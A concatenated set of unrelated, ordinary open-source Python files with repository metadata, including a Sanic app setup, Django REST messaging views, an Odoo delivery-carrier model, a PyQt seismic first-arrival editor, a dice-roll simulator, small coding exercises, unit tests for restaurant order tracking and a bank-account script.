for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(12)
plt.show()
### Save the tables
## Relative importances permutation (all)
perm_imp_rfpimp.to_csv('../../Data/Random_forest_results/model_diffFit_permImportances_allVariables.txt', sep = '\t')
## Predictions for test set(best variables)
df_pred_test_best = pd.DataFrame(list(zip(y_test, pred_test_rf)), columns = ['test_data', 'pred_data'])
df_pred_test_best.to_csv('../../Data/Random_forest_results/pred_rf_bestVariables.txt', sep = '\t')
## Predictions for cross-validation (best variables)
df_pred_crossval_best = pd.DataFrame(list(zip(y_train, cross_validations_pred)), columns = ['test_data', 'pred_data'])
df_pred_crossval_best.to_csv('../../Data/Random_forest_results/crossval_rf_bestVariables.txt', sep = '\t')
## Relative importances drop column (best variables)
importances_drop_col.to_csv('../../Data/Random_forest_results/model_diffFit_dropCol_bestVariables.txt', sep = '\t')
| Landrylab/DfrB1_DMS_2022 | Scripts/Random_forest/Random_forest_DfrB1_DMS.py | Random_forest_DfrB1_DMS.py | py | 10,422 | python | en | code | 0 | github-code | 36 |
16185502227 | import os
from sanic import Sanic
from sanic_session import Session, AIORedisSessionInterface
from ..config import config, log_config
from ..container import Container
from ..adapter.blueprint import handle_exception, message_blueprint,\
post_blueprint, file_blueprint, user_blueprint
os.makedirs(config['DATA_PATH'], 0o755, True)
app = Sanic(config['NAME'].capitalize(), log_config=log_config)
app.config.update(config)
app.error_handler.add(Exception, handle_exception)
app.static('/files', os.path.join(config['DATA_PATH'], config['UPLOAD_DIR']),
stream_large_files=True)
app.blueprint(message_blueprint)
app.blueprint(post_blueprint)
app.blueprint(file_blueprint)
app.blueprint(user_blueprint)
@app.listener('before_server_start')
async def server_init(app, loop):
container = Container(config, log_config)
await container.on_init
Session(app, AIORedisSessionInterface(
container.cache, expiry=config['SESSION_EXPIRY']))
@app.listener('after_server_stop')
async def server_clean(app, loop):
await Container().clean()
if __name__ == '__main__':
app.run(host=config['HOST'], port=config['PORT'], debug=config['DEBUG'],
auto_reload=config['AUTO_RELOAD'], access_log=config['ACCESS_LOG'],
workers=config['WORKERS'])
| jaggerwang/sanic-in-practice | weiguan/api/app.py | app.py | py | 1,296 | python | en | code | 42 | github-code | 36 |
43361270196 | from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from rest_framework.request import Request
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from api.utils import paginate
from message.models import Message
from message.serializer import MessageSerializer, MessageUserSerializer
from people.models import Friend
from user.models import User
from django.db.models import Q
from django.utils import timezone
@api_view(["POST"])
@permission_classes([IsAuthenticated])
def send_message(request:Request, pk):
receiver=get_object_or_404(User, pk=pk)
user = request.user
message = request.data.get("message")
if not message:
return Response("Provide message")
message = Message.objects.create(
sender=user,
receiver=receiver,
content=message
)
return Response(MessageSerializer(message).data)
@api_view(["GET"])
@permission_classes([IsAuthenticated])
def get_message(request, pk):
user = get_object_or_404(User, pk=pk)
messages=Message.objects.filter(Q(
Q(sender=user, receiver=request.user)|
Q(sender=request.user, receiver=user))).order_by("-dateSend")
paginated = paginate(messages, request, MessageSerializer)
return Response(paginated)
@api_view(["GET"])
@permission_classes([IsAuthenticated])
def get_user_last_message(request:Request):
user = request.user
friends = Friend.objects.filter(user1=user)
last_message=[]
for friend in friends:
message = Message.objects.filter(Q(
Q(sender=user, receiver=friend.user2)|
Q(sender=friend.user2, receiver=user)
)).order_by("-dateSend").first()
if not message:
last_message.append({
"friend":friend.user2,
"content":"You can send message to your friend",
"dateSend":timezone.now(),
"lastSenderMe":False
})
else:
last_message.append({
"friend":friend.user2,
"content":message.content,
"dateSend":message.dateSend,
"lastSenderMe":message.sender.id==user.id
})
paginated = paginate(last_message, request, MessageUserSerializer)
return Response(paginated) | Hosea2003/meet-alumni-back | message/views.py | views.py | py | 2,371 | python | en | code | 2 | github-code | 36 |
8755135805 | # -*- coding: utf-8 -*-
import logging
from odoo import models, fields, api, _
from odoo.exceptions import UserError, ValidationError
from odoo.tools.safe_eval import safe_eval
_logger = logging.getLogger(__name__)
class DeliveryCarrier(models.Model):
_inherit = 'delivery.carrier'
of_use_sale = fields.Boolean(string=u"Utilisable à la vente")
of_use_purchase = fields.Boolean(string=u"Utilisable à l'achat")
of_supplier_ids = fields.Many2many(
comodel_name='res.partner', string="Fournisseurs", domain="[('supplier','=',True)]")
@api.one
def get_price(self):
super(DeliveryCarrier, self).get_price()
if not self.price:
PurchaseOrder = self.env['purchase.order']
purchase_id = self.env.context.get('purchase_id', False)
if purchase_id:
purchase = PurchaseOrder.browse(purchase_id)
if self.delivery_type not in ['fixed', 'base_on_rule']:
computed_price = 0.0
else:
carrier = self.verify_carrier(purchase.partner_id)
if carrier:
try:
computed_price = carrier.get_price_available_purchase(purchase)
self.available = True
except UserError as e:
# No suitable delivery method found, probably configuration error
_logger.info("Carrier %s: %s", carrier.name, e.name)
computed_price = 0.0
else:
computed_price = 0.0
self.price = computed_price * (1.0 + (float(self.margin) / 100.0))
@api.multi
def get_price_available_purchase(self, purchase):
self.ensure_one()
weight = volume = quantity = 0
total_delivery = 0.0
for line in purchase.order_line:
if line.state == 'cancel':
continue
if line.of_is_delivery:
total_delivery += line.price_total
if not line.product_id or line.of_is_delivery:
continue
qty = line.product_uom._compute_quantity(line.product_qty, line.product_id.uom_id)
weight += (line.product_id.weight or 0.0) * qty
volume += (line.product_id.volume or 0.0) * qty
quantity += qty
total = (purchase.amount_total or 0.0) - total_delivery
total = purchase.currency_id.with_context(date=purchase.date_order).compute(total, purchase.company_id.currency_id)
return self.get_price_from_picking(total, weight, volume, quantity)
def get_difference_from_picking(self, total, weight, volume, quantity):
self.ensure_one()
price = 0.0
price_dict = {'price': total, 'volume': volume, 'weight': weight, 'wv': volume * weight, 'quantity': quantity}
for line in self.price_rule_ids:
test = safe_eval(line.variable + line.operator + str(line.max_value), price_dict)
if test:
price = line.list_base_price + line.list_price * price_dict[line.variable_factor]
break
return price
| odof/openfire | of_delivery/models/delivery_carrier.py | delivery_carrier.py | py | 3,214 | python | en | code | 3 | github-code | 36 |
34108670875 | A = [int(i) for i in open('17-4.txt')]
print(A)
count = 0
mini = 10001
for i in A:
if (i % 31 == 0 or i % 47 == 0 or i % 53 == 0) and (i % 3 == i % 5):
count += 1
if i < mini:
mini = i
print(count, mini)
| alex3287/ege | lessons_online_1/lesson_4/task_3.py | task_3.py | py | 240 | python | vi | code | 0 | github-code | 36 |
33826107895 | from src.track_orders import TrackOrders
import unittest
from unittest.mock import patch, mock_open, call
mock_csv = [
["eduarda", "pizza", "sexta-feira"],
["eduarda", "rocambole", "sexta-feira"],
["joao", "rocambole", "sexta-feira"],
["eduarda", "coxinha", "segunda-feira"],
["arnaldo", "misto-quente", "sexta-feira"],
["jose", "rocambole", "sabado"],
["eduarda", "rocambole", "sexta-feira"],
["eduarda", "rocambole", "sexta-feira"],
["joao", "rocambole", "sexta-feira"]
]
class Testing_TrackOrders(unittest.TestCase):
def test_init(self):
track = TrackOrders()
assert {} == track.all_sales
assert set() == track.days
assert set() == track.orders
def test_add_new_order(self):
track = TrackOrders()
for name, meal, day in mock_csv:
track.add_new_order(name, meal, day)
assert {
"arnaldo": {"days": {"sexta-feira": 1},
"order": {"misto-quente": 1}},
"joao": {"days": {"sexta-feira": 2}, "order": {"rocambole": 2}},
"jose": {"days": {"sabado": 1}, "order": {"rocambole": 1}},
"eduarda": {"days": {"segunda-feira": 1, "sexta-feira": 4},
"order": {"coxinha": 1, "rocambole": 3, "pizza": 1}}
} == track.all_sales
assert {
"sabado", "segunda-feira", "sexta-feira"
} == track.days
self.assertEqual(set(
{"coxinha", "rocambole", "misto-quente", "pizza"}
), track.orders)
def test_get_most_ordered_dish_per_costumer(self):
track = TrackOrders()
for name, meal, day in mock_csv:
track.add_new_order(name, meal, day)
result = track.get_most_ordered_dish_per_costumer("eduarda")
assert result == "rocambole"
def test_get_order_frequency_per_costumer(self):
track = TrackOrders()
for name, meal, day in mock_csv:
track.add_new_order(name, meal, day)
result1 = track.get_order_frequency_per_costumer(
"eduarda", "rocambole")
result2 = track.get_order_frequency_per_costumer("eduarda", "jiló")
assert result1 == 3
assert result2 == 0
def test_get_never_orderes_per_costumer(self):
track = TrackOrders()
for name, meal, day in mock_csv:
track.add_new_order(name, meal, day)
result = track.get_never_ordered_per_costumer("eduarda")
assert result == {"misto-quente"}
def test_get_days_never_visited_per_costumer(self):
track = TrackOrders()
for name, meal, day in mock_csv:
track.add_new_order(name, meal, day)
result = track.get_days_never_visited_per_costumer("eduarda")
assert result == {"sabado"}
# Obtenha, no mínimo, 90% de cobertura
| EddyeBoy27/restaurant-orders | tests/test_track_orders.py | test_track_orders.py | py | 2,826 | python | en | code | 0 | github-code | 36 |
17736050506 | import re
import requests
import json
import osascript
import hashlib
from bs4 import BeautifulSoup
def main():
# Get browser and player data via AppleScript
code, output, err = getBrowserAndPlayerData()
# print(output,err)
current_data = output.split(', ')
# Separate output
player_data = current_data[0:4]
browser_data = current_data[4:]
# Process player and browser data
player_type, player_artist, player_song, player_state = processPlayerData(
player_data)
browser_type, browser_artist, browser_song, browser_state = processBrowserData(
browser_data)
# Determine priority, player or browser
priority = (playerOrBrowser(
player_type, player_state, browser_type, browser_state))
# print(priority)
if priority == "player":
artist = player_artist
song = player_song
elif priority == "browser":
artist = browser_artist
song = browser_song
else:
return
# Remove extra information from title
song = cleanSong(song)
artist_1, artist_2 = multipleArtistCheck(artist)
# Prepare array of artists
artist_array = [artist, artist_1, artist_2]
# print('\nPlayer Full Artist: ' + player_artist + '\nPlayer Artist 1: ' + player_artist_1 + '\nPlayer Artist 2: ' + player_artist_2 + '\nPlayer Song: ' + player_song)
# Access Genius API 'https://docs.genius.com'
accesstoken = 'ORYExHGED-rUDNu6wEqCt42NCg9nFuBiCiVKAYkjSrS6aQ1RHdyyjp5gl7GlpXZH'
headers = {'Authorization': 'Bearer ' + accesstoken, 'User-Agent': 'Kashi',
'Accept': 'application/json', 'Host': 'api.genius.com'}
params = {'q': artist + ' ' + song}
hits = requests.get('https://api.genius.com/search',
params=params, headers=headers).json()['response']['hits']
# for hit in hits:
# print ("Artist: " + hit['result']['primary_artist']['name'] + "\nSong: " + hit['result']['full_title'])
hitcount = 0
if len(hits) > 0:
# Get info from top search hit that contains player artist
while hitcount < len(hits) - 1 and not any([x in hits[hitcount]['result']['primary_artist']['name'].lower() for x in artist_array]):
hitcount += 1 # Go to next hit
genius_artist = hits[hitcount]['result']['primary_artist']['name'].lower(
)
genius_song = hits[hitcount]['result']['full_title'].lower()
genius_url = hits[hitcount]['result']['url']
# print('\nGenius Artist: ' + genius_artist + '\nGenius Song: ' + genius_song + '\nGenius URL: ' + genius_url + '\n')
if any([y in genius_artist for y in artist_array]):
# Parse Genius HTML with BeautifulSoup and format lyrics
lyrics = parseAndFormat(genius_url)
# FINAL STEP: Print to touch bar
print(lyrics)
else:
# Print music quote if lyrics not found
printWisdom(song)
else:
printWisdom(song)
return
def getBrowserAndPlayerData():
applescript = '''
on run
if application "Spotify" is running then
tell application "Spotify"
set playerData to {"Spotify", artist of current track, name of current track, player state}
end tell
else if application "Music" is running then
tell application "Music"
set playerData to {"Music", artist of current track, name of current track, player state}
end tell
else
set playerData to {"none", "none", "none", "none"}
end if
if (application "Google Chrome" is running) and (exists (front window of application "Google Chrome")) then
tell application "Google Chrome"
set browserData to {"Chrome", title of active tab of front window}
end tell
else if (application "Safari" is running) and (exists (front window of application "Safari")) then
tell application "Safari"
set browserData to {"Safari", name of current tab of front window}
end tell
else
set browserData to {"none", "none"}
end if
set currentData to {playerData, browserData}
return currentData
end run
'''
return osascript.run(applescript, background=False)
def processBrowserData(browser_data):
browser_artist = browser_song = ""
# Check that tab is a Youtube video
if " - YouTube" in browser_data[1]:
# Remove "Youtube" from title
browser_data[1] = browser_data[1][0:-10]
# Check for music video
if " - " in browser_data[1]:
# Music video likely. Parse for Artist/Song
browser_artist = re.search(
r'^([^\-]+)', browser_data[1]).group(0).strip().lower()
browser_song = re.search(
r'([^\-]+)$', browser_data[1]).group(0).strip().lower()
browser_state = 'playing'
else:
# Music video not likely
browser_state = 'paused'
else:
# Not a Youtube video page
browser_state = 'paused'
return browser_data[0], browser_artist, browser_song, browser_state
def processPlayerData(player_data):
player_type = player_data[0]
# Recombine artist or title that may have been split up if commas in title
player_data = normalizeCommas(player_type, player_data)
player_artist = player_data[1].lower()
player_song = player_data[2].lower()
player_state = player_data[3].lower()
return player_type, player_artist, player_song, player_state
def playerOrBrowser(player_type, player_state, browser_type, browser_state):
if player_state == "playing":
return "player"
elif browser_state == "playing":
return "browser"
else:
return
def normalizeCommas(engine, player_data):
while len(player_data) > 5:
if engine == 'Music': # Music: Combine artists split by comma
player_data[1] = player_data[1] + ', ' + player_data[2]
player_data.pop(2)
else: # Spotify: Combine songs split by comma
player_data[2] = player_data[2] + ', ' + player_data[3]
player_data.pop(3)
return player_data
def cleanSong(songtitle):
# Remove everything after dash
songtitle = re.sub(r' -.*$', '', songtitle)
songtitle = re.sub(r' \(.*\)', '', songtitle) # Remove parentheses
songtitle = re.sub(r' \[.*\]', '', songtitle) # Remove brackets
return songtitle
def multipleArtistCheck(artist):
if '&' in artist:
artist_1 = re.sub(r' \&.*$', '', artist)
artist_2 = re.sub(r'^.*\& ', '', artist)
else:
artist_1 = 'n/a'
artist_2 = 'n/a'
return artist_1, artist_2
def parseAndFormat(url):
source_soup = BeautifulSoup(requests.get(
url).text, 'html.parser') # Parse HTML
# Get text from the lyrics <div>
lyricstext = source_soup.find('div', class_='lyrics').get_text()
# Remove song sections in brackets
lyricstext = re.sub(r'\[.*\n*.*\]', '', lyricstext).strip()
# Remove parentheticals
lyricstext = re.sub(r'\(.*\n*.*\)', '', lyricstext).strip()
while '\n\n' in lyricstext: # Line breaks, flatten, and replace
lyricstext = lyricstext.replace('\n\n', '\n')
lyricstext = lyricstext.replace('\n', ', ').replace('?,', '?').replace('!,', '!').replace(' ,', ',').replace(
' .', '.').replace('.,', '.').replace(',.', '.').replace('...', '..').replace('...', '..').replace(' ', ' ')
return lyricstext
def printWisdom(player_song):
wisdom = [
'\"Music expresses that which cannot be said and on which it is impossible to be silent.\" - Victor Hugo ',
'\"If music be the food of love, play on.\" - William Shakespeare ',
'\"Where words fail, music speaks.\" - Hans Christian Anderson ',
'\"One good thing about music, when it hits you, you feel no pain.\" - Bob Marley ',
'\"And those who were seen dancing were thought to be insane by those who could not hear the music.\" - Nietzsche ',
'\"There is geometry in the humming of the strings, there is music in the spacing of the spheres.\" - Pythagoras ',
'\"You are the music while the music lasts.\" - T. S. Eliot ',
'\"After silence, that which comes nearest to expressing the inexpressible is music.\" - Aldous Huxley '
]
# Hash songname for constant quote when script refires
songhash = hashlib.sha224(player_song.encode('utf-8')).hexdigest()
songhash_int = int(songhash, base=16)
# Reduce hash to within array length
print(wisdom[(songhash_int % (len(wisdom) + 1)) - 1])
if __name__ == '__main__':
main()
| jimu-gh/Kashi | kashi.py | kashi.py | py | 8,841 | python | en | code | 50 | github-code | 36 |
25626283123 | def findReplaceString ( S: str, indexes, sources, targets) -> str:
if not S or not sources or not targets:
return S
else:
for j in range (len (sources)):
if sources[j] in S:
l = len (sources[j])
ind = S.index (sources[j][0])
if ind > -1:
S = S[:ind] + targets[j] + S[ind + l:]
break
return S
S = "abcd"
indexes = [0,2]
sources = ["a","cd"]
targets = ["eee","ffff"] | Akashdeepsingh1/project | ms/find and replace string.py | find and replace string.py | py | 499 | python | en | code | 0 | github-code | 36 |
36132831318 | """
Dialog for editing first arrivals.
"""
from PyQt5 import QtCore, QtGui, QtWidgets
import numpy as np
import pyqtgraph as qtg
class FirstArrivalDlg(QtWidgets.QDialog):
def __init__(self, measurement, genie, parent=None):
super().__init__(parent)
self._measurement = measurement
self.genie = genie
self._sampling_rate = self._measurement.data["data"][0].stats.sampling_rate
title = "First arrival editor - source: {}, file: {}".format(self._measurement.source_id, self._measurement.file)
self.setWindowTitle(title)
grid = QtWidgets.QGridLayout(self)
# plot axis wiget
qtg.setConfigOptions(background="w", foreground="k")
graphic_axis_wiget = qtg.GraphicsLayoutWidget(self)
plot = graphic_axis_wiget.addPlot(enableMenu=False)
plot.setLabel('left', "")
plot.setMouseEnabled(False, False)
x_max = len(self._measurement.data["data"][0].data) / self._sampling_rate
plot.setXRange(0, x_max * 1.001, padding=0)
plot.getAxis('bottom').setStyle(showValues=False)
plot.getAxis('bottom').hide()
plot.getAxis('left').setStyle(showValues=False)
plot.getAxis('left').setHeight(0)
plot.hideButtons()
plot.setLabel('top', "Time", units='s')
plot.getAxis('top').setStyle(showValues=True)
plot.setLabel('left', " ")
scroll = QtWidgets.QScrollArea()
scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
scroll.verticalScrollBar().setVisible(False)
scroll.setWidgetResizable(True)
grid.addWidget(scroll, 0, 0, 1, 6)
sw=QtWidgets.QWidget()
sw.setMaximumHeight(80)
scroll.setMaximumHeight(85)
scroll.setMinimumHeight(85)
scroll.setWidget(sw)
hbox = QtWidgets.QHBoxLayout()
sw.setLayout(hbox)
label = QtWidgets.QLabel("Use")
label.setMinimumWidth(30)
label.setMaximumWidth(30)
hbox.addWidget(label)
hbox.addWidget(graphic_axis_wiget)
# plot wiget
self._graphic_wiget = qtg.GraphicsLayoutWidget(self)
self._plot_list = []
self._line_list = []
self._line_auto_list = []
self._checkbox_list = []
scroll = QtWidgets.QScrollArea()
scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
scroll.setWidgetResizable(True)
grid.addWidget(scroll, 1, 0, 3, 6)
sw=QtWidgets.QWidget()
scroll.setWidget(sw)
hbox = QtWidgets.QHBoxLayout()
sw.setLayout(hbox)
self._vbox = QtWidgets.QVBoxLayout()
hbox.addLayout(self._vbox)
hbox.addWidget(self._graphic_wiget)
lay = QtWidgets.QHBoxLayout()
label = QtWidgets.QLabel("Auto")
label.setStyleSheet("QLabel { color: #00ff00;}")
lay.addWidget(label)
label = QtWidgets.QLabel("Manual")
label.setStyleSheet("QLabel { color : blue; }")
lay.addWidget(label)
lay.addStretch()
grid.addLayout(lay, 6, 0)
self._close_button = QtWidgets.QPushButton("Close", self)
self._close_button.clicked.connect(self.reject)
grid.addWidget(self._close_button, 6, 5)
self.setLayout(grid)
self.setMinimumSize(500, 250)
self.resize(1000, 800)
self._create_plot()
def _create_plot(self):
row = 0
meas = self._measurement
data = meas.data["data"]
for i in range(meas.channel_start - 1, meas.channel_start + abs(meas.receiver_stop - meas.receiver_start)):
row += 1
trace = data[i]
inc = 1 if meas.receiver_stop > meas.receiver_start else -1
title = "receiver: {}".format(meas.receiver_start + i * inc)
plot = self._graphic_wiget.addPlot(row=row, col=1, enableMenu=False)
plot.setLabel('left', title)
plot.setMouseEnabled(False, False)
self._plot_list.append(plot)
checkbox = QtWidgets.QCheckBox()
checkbox.setMinimumSize(30, 150)
checkbox.setMaximumWidth(30)
self._checkbox_list.append(checkbox)
self._vbox.addWidget(checkbox)
x_max = len(trace.data) / self._sampling_rate
x = np.linspace(0, x_max, len(trace.data))
y = trace.data / np.max(np.abs(trace.data))
plot.plot(x, y, pen="r")
plot.setXRange(0, x_max * 1.001, padding=0)
plot.setYRange(-1, 1, padding=0)
plot.getAxis('bottom').setStyle(showValues=False)
plot.getAxis('left').setStyle(showValues=False)
plot.showGrid(x=True, y=True)
plot.hideButtons()
# cross hair auto
vLineAuto = qtg.InfiniteLine(angle=90, movable=False, pen=qtg.mkPen(qtg.mkColor("g")))
self._line_auto_list.append(vLineAuto)
plot.addItem(vLineAuto, ignoreBounds=True)
# cross hair
vLine = qtg.InfiniteLine(angle=90, movable=True, pen=qtg.mkPen(qtg.mkColor("b")))
self._line_list.append(vLine)
plot.addItem(vLine, ignoreBounds=True)
fa = self._find_fa(i)
if fa is not None:
if fa.verified:
t = fa.time
else:
t = -0.1
vLine.setPos(t)
checkbox.setChecked(fa.use)
vLineAuto.setPos(fa.time_auto)
if self._plot_list:
self._plot_list[0].scene().sigMouseClicked.connect(self.mouseClickEvent)
#plot.setLabel('bottom', "Time", units='s')
#plot.getAxis('bottom').setStyle(showValues=True)
self._graphic_wiget.setMinimumSize(100, 150 * row)
def mouseClickEvent(self, ev):
if ev.button() == QtCore.Qt.RightButton:
for i, plot in enumerate(self._plot_list):
if plot.sceneBoundingRect().contains(ev.scenePos()):
self._line_list[i].setPos(self._line_auto_list[i].getPos()[0])
ev.accept()
break
def _find_fa(self, channel):
for fa in self.genie.current_inversion_cfg.first_arrivals:
if fa.file == self._measurement.file and fa.channel == channel:
return fa
return None
def reject(self):
for i, vLine in enumerate(self._line_list):
fa = self._find_fa(i)
if fa is not None:
line_pos = float(vLine.getPos()[0])
if line_pos > 0:
fa.time = line_pos
fa.verified = True
else:
fa.time = 0.0
fa.verified = False
fa.use = self._checkbox_list[i].isChecked()
super().reject()
| GeoMop/Genie | src/genie/ui/dialogs/first_arrival_dialog.py | first_arrival_dialog.py | py | 6,825 | python | en | code | 1 | github-code | 36 |
25625718223 | '''
Given a 2D grid, each cell is either a zombie 1 or a human 0. Zombies can turn adjacent (up/down/left/right) human beings into zombies every hour. Find out how many hours does it take to infect all humans?
Example:
Input:
[[0, 1, 1, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0]]
Output: 2
Explanation:
At the end of the 1st hour, the status of the grid:
[[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 1],
[1, 1, 1, 0, 1]]
At the end of the 2nd hour, the status of the grid:
[[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]]
int minHours(int rows, int columns, List<List<Integer>> grid) {
}
'''
def solution(input_matrix):
count_hours = 0
FLAG = True
while FLAG:
list_val = []
FLAG = False
for i in range(len(input_matrix)):
for j in range(len(input_matrix[0])):
if input_matrix[i][j] == 1:
list_val.append((i,j))
elif input_matrix[i][j] == 0:
FLAG = True
if FLAG:
count_hours+=1
for each in list_val:
i,j = each
if i-1 >=0 and input_matrix[i-1][j] == 0 :
input_matrix[i-1][j] = 1
if i+1<len(input_matrix) and input_matrix[i+1][j] == 0:
input_matrix[i+1][j] = 1
if j-1>= 0 and input_matrix[i][j-1] == 0:
input_matrix[i][j-1] = 1
if j+1<len(input_matrix[0]) and input_matrix[i][j+1] == 0:
input_matrix[i][j+1] = 1
print(input_matrix)
return count_hours
input_matrix = [[0, 1, 1, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0]]
print (solution (input_matrix)) | Akashdeepsingh1/project | 2020/ZombieMatrix.py | ZombieMatrix.py | py | 1,753 | python | en | code | 0 | github-code | 36 |
4876381764 | import re
import pandas as pd
import m4i_metrics.config as config
from ..Metric import Metric
from ..MetricColumnConfig import MetricColumnConfig
from ..MetricConfig import MetricConfig
elems_non_compliant_config = MetricConfig(**{
'description': 'The names of these elements are not structured as a sentence',
'id_column': 'id',
'data': {
'id': MetricColumnConfig(**{
'displayName': 'ID',
'description': 'The identifier of the element'
}),
'name': MetricColumnConfig(**{
'displayName': 'Current name',
'description': 'The current name of the element'
}),
'rec_name': MetricColumnConfig(**{
'displayName': 'Suggested name',
'description': 'The suggested name of the element'
})
}
})
rels_non_compliant_config = MetricConfig(**{
'description': 'The names of these relationships are not structured as a sentence',
'id_column': 'id',
'data': {
'id': MetricColumnConfig(**{
'displayName': 'ID',
'description': 'The identifier of the relationship'
}),
'name': MetricColumnConfig(**{
'displayName': 'Current name',
'description': 'The current name of the relationship'
}),
'rec_name': MetricColumnConfig(**{
'displayName': 'Suggested name',
'description': 'The suggested name of the relationship'
})
}
})
views_non_compliant_config = MetricConfig(**{
'description': 'The names of these views are not structured as a sentence',
'id_column': 'id',
'data': {
'id': MetricColumnConfig(**{
'displayName': 'ID',
'description': 'The identifier of the view'
}),
'name': MetricColumnConfig(**{
'displayName': 'Current name',
'description': 'The current name of the view'
}),
'rec_name': MetricColumnConfig(**{
'displayName': 'Suggested name',
'description': 'The suggested name of the view'
})
}
})
sentence = re.compile(
r"^[A-Z1-90][a-zA-Z1-90\.\-_\(\)\[\])]*([ ][A-Za-z1-90\(\)\[\]][a-zA-Z1-90\.\-_\(\)\[\])]*|$)*$"
)
class ConceptLabelFormattingMetric(Metric):
id = '8ddd174e-0c42-478b-b719-8d678a72304f'
label = 'Concept Label Formatting'
@staticmethod
def calculate(model):
elems = model.nodes.copy()
rels = model.edges.copy()
views = model.views.copy()
elems['sentence'] = elems.name.apply(lambda x: config.COMPLIANT_TAG if not sentence.match(
x) == None else config.NON_COMPLIANT_TAG)
rels['sentence'] = rels.name.apply(lambda x: config.COMPLIANT_TAG if x in [
'Yes', 'No'] or x is None or len(x) == 0 else config.NON_COMPLIANT_TAG)
views['sentence'] = views.name.apply(lambda x: config.COMPLIANT_TAG if not sentence.match(
x) == None else config.NON_COMPLIANT_TAG)
elems['rec_name'] = elems.name.apply(
lambda x: x.capitalize() if sentence.match(x.capitalize()) else '')
rels['rec_name'] = rels.name.apply(
lambda x: x.capitalize() if x.capitalize() in ['Yes', 'No'] else '')
views['rec_name'] = views.name.apply(
lambda x: x.capitalize() if sentence.match(x.capitalize()) else '')
elems_non_compliant = elems[elems.sentence == config.NON_COMPLIANT_TAG][[
'id', 'name', 'rec_name']]
rels_non_compliant = rels[rels.sentence == config.NON_COMPLIANT_TAG][[
'id', 'name', 'rec_name']]
views_non_compliant = views[views.sentence == config.NON_COMPLIANT_TAG][[
'id', 'name', 'rec_name']]
return {
"elements": {
"config": elems_non_compliant_config,
"data": elems_non_compliant,
"sample_size": len(elems.index),
"type": 'metric'
},
"relationships": {
"config": rels_non_compliant_config,
"data": rels_non_compliant,
"sample_size": len(rels.index),
"type": 'metric'
},
"views": {
"config": views_non_compliant_config,
"data": views_non_compliant,
"sample_size": len(views.index),
"type": 'metric'
}
}
# END of calculate
def get_name(self):
return 'ConceptLabelFormattingMetric'
# END get_name
# END ConceptLabelFormattingMetric
| wombach/docker-python-rest | extra_modules/metrics/m4i_metrics/textual/ConceptLabelFormattingMetric.py | ConceptLabelFormattingMetric.py | py | 4,592 | python | en | code | 1 | github-code | 36 |
8926252017 | ##############################################################################################
# File: diceSim.py
# Author: Sam Wareing
# Description: script to determine probability of dice rolls using monte carlo simulation
#
#
#
##############################################################################################
import sys
from random import randint
from collections import Counter
def simulateDiceRolls(dice, num_simulations):
counts = Counter()
for roll in range(num_simulations):
counts[sum((randint(1, sides) for sides in dice))] += 1
print("\nOUTCOME\tPROBABILITY")
for outcome in range(len(dice), sum(dice)+1):
print('{}\t{:0.2f}%'.format(outcome, counts[outcome]*100/num_simulations))
def usage():
print("diceSim.py # # #....")
if __name__ == "__main__":
print("let's sim some dice")
if len(sys.argv) < 2:
usage()
exit()
num_simulations = input("How many simulations? press enter for default 1000000 ")
if num_simulations == "":
num_simulations = 1000000
else:
num_simulations = int(num_simulations)
n = len(sys.argv)
dice = [int(sys.argv[i]) for i in range(1, n)]
simulateDiceRolls(dice, num_simulations)
| sjwar455/PythonCodeChallenges | diceSim.py | diceSim.py | py | 1,183 | python | en | code | 0 | github-code | 36 |
12486902960 | """
Basic Syntax, Conditional Statements and Loops - Exercise
Check your code: https://judge.softuni.bg/Contests/Compete/Index/1719#7
Video: https://www.youtube.com/watch?time_continue=4&v=7sHE4HEUqi8
SUPyF2 Basic Exercise - 08. Mutate Strings (not included in final score)
Problem:
You will be given two strings. Transform the first string into the second one, one letter at a time and print it.
Print only the unique strings
Note: the strings will have the same lengths
Examples:
Input:
bubble gum
turtle hum
Output:
tubble gum
turble gum
turtle gum
turtle hum
turtle ham
Input:
Kitty
Doggy
Output:
Ditty
Dotty
Dogty
Doggy
"""
string_1 = [letter for letter in input()]
string_2 = [letter for letter in input()]
for letter in range(len(string_2)):
if string_1[letter] != string_2[letter]:
string_1[letter] = string_2[letter]
print("".join(string_1))
| SimeonTsvetanov/Coding-Lessons | SoftUni Lessons/Python Development/Python Fundamentals September 2019/Problems And Files/05 EX. B. SYNTAX, CONDITIONAL STATE. AND LOOPS - Дата 20-ти септември, 1430 - 1730/08. Mutate Strings.py | 08. Mutate Strings.py | py | 917 | python | en | code | 9 | github-code | 36 |
40420933577 | # projekt Konto_bankowe, w dalszej części komentarzy referencje do obketów są nazywane obiektami:
from konto import * #zaimportowanie klas i modułów z pliku konto.py
konto1 = Konto(1000) #utworzenie obiektu klasy Konto -> stan_konta = 1000
konto2 = KontoBankowe("Janas", 2000) #utworzenie obiektu klasy KontoBankowe -> nazwisko = "Janas", stan_konta = 2000
konto3 = KontoOsobiste(0, "Kowalski", 3000) #utworzenie obiektu klasy KontoOsobiste -> minimalny_stan_konta = 0, nazwisko = "Kowalski", stan_konta = 3000
konto4 = KontoOsobiste(0, "Ratajczak", 3000) #utworzenie obiektu klasy KontoOsobiste -> minimalny_stan_konta = 0, nazwisko = "Ratajczak", stan_konta = 3000
konto5 = KontoOsobiste(0, "Borowski", 3000) #utworzenie obiektu klasy KontoOsobiste -> minimalny_stan_konta = 0, nazwisko = "Borowski", stan_konta = 3000
konto6 = KontoOsobiste(0, "Kosmyk", 3000) #utworzenie obiektu klasy KontoOsobiste -> minimalny_stan_konta = 0, nazwisko = "Kosmyk", stan_konta = 3000
bank = Bank() #utworzenie obiektu klasy Bank
bank.dodaj_konto(konto1) #
bank.dodaj_konto(konto2) #
bank.dodaj_konto(konto3) #Przypisanie obiektów klasy Konto do listy obiektów w klasie Bank
bank.dodaj_konto(konto4) #
bank.dodaj_konto(konto5) #
bank.dodaj_konto(konto6) #
